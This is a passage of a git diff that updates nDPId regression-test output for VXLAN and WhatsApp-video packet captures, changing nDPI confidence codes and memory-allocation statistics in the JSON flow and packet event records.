-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442941,"flow_last_seen":1639650442941,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442941,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":36286,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442941,"flow_last_seen":1639650442941,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442941,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":36286,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1639650442941,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":120,"pkt_l4_len":82,"thread_ts_msec":1639650442941,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAZgNwAABAEcm9wKgWBMCoFgWexhK1AFInFQgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA0KWpAAEAGdTgKChQEnfDgI7CsAbtx7JCQEsQ2M4AQAfsmmgAAAQEICvUMMzE3WVST"} 
00964{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1639650442942,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":438,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":438,"pkt_l4_len":400,"thread_ts_msec":1639650442942,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQABpANxAABAEch+wKgWBMCoFgWexhK1AZAl1wgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAFyKWtAAEAGc\/kKChQEnfDgI7CsAbtx7JCQEsQ2M4AYAfsFYwAAAQEICvUMMzE3WVSTFgMBATkBAAE1AwM+kikCjZKYLJ0yMsC2SkPOGgwTwgkXQ4SgJHcmBMuaciDzcy2bbZtRNimKWfvjKRYfjG8z06\/JyuimMrKvKOQk2AA+EwITAxMBwCzAMACfzKnMqMyqwCvALwCewCTAKABrwCPAJwBnwArAFAA5wAnAEwAzAJ0AnAA9ADwANQAvAP8BAACuAAAAFQATAAAQd3d3LmZhY2Vib29rLmNvbQALAAQDAAECAAoADAAKAB0AFwAeABkAGAAjAAAAFgAAABcAAAANADAALgQDBQMGAwgHCAgICQgKCAsIBAgFCAYEAQUBBgEDAwIDAwECAQMCAgIEAgUCBgIAKwAJCAMEAwMDAgMBAC0AAgEBADMAJgAkAB0AIFjRzvsXuQ0A5A179GyLQXzYsfihHOpNhs3mPbXqyp9j"} 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1639650442952,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":120,"pkt_l4_len":82,"thread_ts_msec":1639650442952,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAZq9YAABAER3VwKgWBcCoFgSNvhK1AFKtvQgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAA0iYtAAFcG\/g6d8OAjCgoUBAG7sKwSxDYzceyRzoAQAQUmRwAAAQEICjdZVJ71DDMx"} 
02407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1639650442953,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1500,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1500,"pkt_l4_len":1462,"thread_ts_msec":1639650442953,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAFyq9ZAABAERhwwKgWBcCoFgSNvhK1BbazIQgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAWYiYxAAFcG+Kmd8OAjCgoUBAG7sKwSxDYzceyRzoAQAQUwxgAAAQEICjdZVJ\/1DDMxFgMDAHoCAAB2AwOCxvI5EXHPK47hHjBvMw\/BI06Lkop9Q1UWqJnwHHEN3CDzcy2bbZtRNimKWfvjKRYfjG8z06\/JyuimMrKvKOQk2BMDAAAuACsAAgMEADMAJAAdACDAmDgjswZAHJO96Fxo5TF\/yHycPaDsaAssE+9YRtxuEBQDAwABARcDAwP5a5IZfVeyKEpOW0ufVGHnS60wv8jhNGuVFX1zlQlbDVGUUfZZGketBg2YthNR92n\/MnYwVxVhLF8luCNg98YcDHmLLzoHZsL49nDI+l9FD1r3wmiZMWL0y3yQZ\/JJQKcjOwcRiF5wjYIImRQjdfRPMVOpZX\/eVRUbhOETdoAwwjdl+orOFnHqlPn5W8zlz4vJR9+aKEMgg4VpLfA7gJ9BUce3E1AaydUD+XJnWAEIHLgcGKblAISRpe7EvwEoeN3STwz5TvBkeELGXhsRX3VYe06CV9GB9VUiMOxvkOe31kzQb1w5L8Q9dutguKq4auDiRIQdo3UPxjULEUEc8daV3AVkJf2C1IybYidwRoHGi86ATrnZfFObldSoDiKx4JXrwos9QDOQpTdBNWZYx1lo\/uqq\/8g1iPHfxsw1J8SNoIu5azXqXHRnZtnkXa0yFNP8rYYC0HNJXH5qFNBZ2p1fwoVg6AJX9XpDhAf\/k3osd3p+iDepC3IlVLkm+GmIka\/ZxprUZwNv+NGPRXYwQEVExWeySi4zMfz+B08WmlYQlxDWeXWgy2Izp8brlY84iY7t+GG4wm4JGr4A5KEWS58eKrUQrvPFR3jjXo6\/NCMu1YlygA+8c1qXjV+4IWGGMZkGFl87oSHi5P5ls+PzEck+yxjmOkP2mvhzrgr8cdbPj8RHsmNL+PETzQCtb1+I3PsP7AAQBnvJY2h7WghCBHgXKcXI9Fb91uYXjT0slYvTKjLrM+DmeFlzGURSW\/vAfQS1WzWshi0ZK\/8PHNQOsgSP5kX6vbKm1\/h4vdrSdq9Xy+3ChNYwY3Nz9UiRkomRmJoIRcqg8BPD4F7Li3UV4xy3ABlESzoqS14VkfVrJvF8Mssxb9uvKQB+Qftsw2prI4ct04qYspIUp+UyM6Y\/2OJhQWUzJBR7uDTVCn7cANa1qv5E81wp3WQIDI4BILWzecMZ++5JNOCdB5nQhfnz\/N46Rxh2m7dGQVsrhILqQg18vZWRXgsaYlpdWLllg3Cc33BYO\/+xQSxE5dvD+kHOSyP82e6eYHseshW7ln2FQDBjhnpBmuu8bKe+ZLkLevp6JoX4n7CIT23dcVV70UPfHzh3IBD9V+aD+PezeVtAGtuN4sZFohCJqTCjU\/XDcbZBeh6OfGZnUa850szjVLwzCcjXUP5B2l9n8SVTcXC3TF1cNpmTKwK01\/iJodz\/Q1ONsNdD4Jx8jY\/TLAlz4SJ+p7EPwFCMcwgZZKDl7ng
wm0oPKncBrp0h2I0LOu793MxLBZwWgaM2KE3RBP2Qczs4SWP11UNQru+qxNl5EQLpinZejHt4hIt43rCVfRdXm2XDWme1jb1NB\/BYjxMUFwMDBe2NF\/B6RhuN92VOyJI6GV0+4MNlaQ2zRuSi41Qbfxms7nL+4fbQoszMAls3NvQOy8nluFZhTsFed4rEOfffnONOkD7LtY9K1a3OfMAvUkl3q6LpSyD0SRfScUpqPrYnKJKjotSjbJI1H3Jju7kYZHpZmKplW8uHRWRib1NTXyMtmkspyf4o9O8JqQuaFjRmqaxCy5szM8p4uCMgWJOsDWJwQOAiq9lsGYapphKG4xh87apARlJDtwJp7Pqq0l3QKmlxxFqvbS6YLtQFb\/KsIDWmRMf\/M0ylaAuf8pwk"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650443097,"flow_last_seen":1639650443097,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1639650443097,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60230,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1639650443097,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":108,"pkt_l4_len":70,"thread_ts_msec":1639650443097,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAWgOIAABAEcmxwKgWBMCoFgXrRhK1AEbaoAgAAAAABFcAZnpQqv+aHuppKm\/PCABFCAAoAABAAEAGnqYKChQEnfDgI7CqAbtGa9YTAAAAAFAEAABE2gAA"} 
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650443097,"flow_last_seen":1639650443097,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1639650443097,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60230,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650443097,"flow_last_seen":1639650443097,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1639650443097,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60230,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1639650443097,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":108,"pkt_l4_len":70,"thread_ts_msec":1639650443097,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAWgOJAABAEcmwwKgWBMCoFgXrRhK1AEbaoAgAAAAABFcAZnpQqv+aHuppKm\/PCABFCAAoAABAAEAGnqYKChQEnfDgI7CqAbtGa9YTAAAAAFAEAABE2gAA"} 
00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1639650443097,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":108,"pkt_l4_len":70,"thread_ts_msec":1639650443097,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAWgOKAABAEcmvwKgWBMCoFgXrRhK1AEbaoAgAAAAABFcAZnpQqv+aHuppKm\/PCABFCAAoAABAAEAGnqYKChQEnfDgI7CqAbtGa9YUAAAAAFAEAABE2QAA"} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1639650442864,"flow_last_seen":1639650442864,"flow_idle_time":200000,"flow_min_l4_payload_len":84,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60351,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1639650442902,"flow_last_seen":1639650442930,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":50251,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":56,"flow_first_seen":1639650442941,"flow_last_seen":1639650443276,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":1454,"flow_tot_l4_payload_len":68647,"flow_avg_l4_payload_len":1225,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":36286,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1639650442645,"flow_last_seen":1639650442645,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60887,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1639650442931,"flow_last_seen":1639650443276,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":3328,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":40646,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1639650442712,"flow_last_seen":1639650443088,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":388,"flow_tot_l4_payload_len":1459,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":49762,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1639650443097,"flow_last_seen":1639650443097,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60230,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1639650442720,"flow_last_seen":1639650443097,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":1454,"flow_tot_l4_payload_len":5058,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":60230,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1639650442682,"flow_last_seen":1639650442711,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":43866,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1639650442864,"flow_last_seen":1639650442864,"flow_idle_time":200000,"flow_min_l4_payload_len":84,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60351,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1639650442902,"flow_last_seen":1639650442930,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":50251,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":56,"flow_first_seen":1639650442941,"flow_last_seen":1639650443276,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":1454,"flow_tot_l4_payload_len":68647,"flow_avg_l4_payload_len":1225,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":36286,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1639650442645,"flow_last_seen":1639650442645,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60887,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1639650442931,"flow_last_seen":1639650443276,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":3328,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":40646,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1639650442712,"flow_last_seen":1639650443088,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":388,"flow_tot_l4_payload_len":1459,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":49762,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1639650443097,"flow_last_seen":1639650443097,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60230,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1639650442720,"flow_last_seen":1639650443097,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":1454,"flow_tot_l4_payload_len":5058,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":60230,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1639650442682,"flow_last_seen":1639650442711,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":43866,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","packets-captured":127,"packets-processed":127,"total-skipped-flows":0,"total-l4-payload-len":79480,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":53,"global_ts_msec":1639650443276} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 127/127 @@ -59,9 +59,9 @@ ~~ total active/idle flows...: 9/9 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5881606 bytes -~~ total memory freed........: 5881606 bytes -~~ total allocations/frees...: 118273/118273 +~~ total memory allocated....: 6015240 bytes +~~ total memory freed........: 6015240 bytes +~~ total allocations/frees...: 121035/121035 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 2412 chars diff --git a/test/results/wa_video.pcap.out b/test/results/wa_video.pcap.out index d7cf2fd7b..9fe2a4ad3 100644 
--- a/test/results/wa_video.pcap.out +++ b/test/results/wa_video.pcap.out 
@@ -2,30 +2,30 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"wa_video.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1561455764448} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455764448,"flow_last_seen":1561455764448,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455764448,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1561455764448,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455764448,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABI0kIAAEARIhLAqAIBwKgC\/+EV4RUANEtUU3BvdFVkcDC64ScQKi2g\/wABAARIlcIDyUSzc\/3fJAksKuG26pMF0apN5Ek="} 
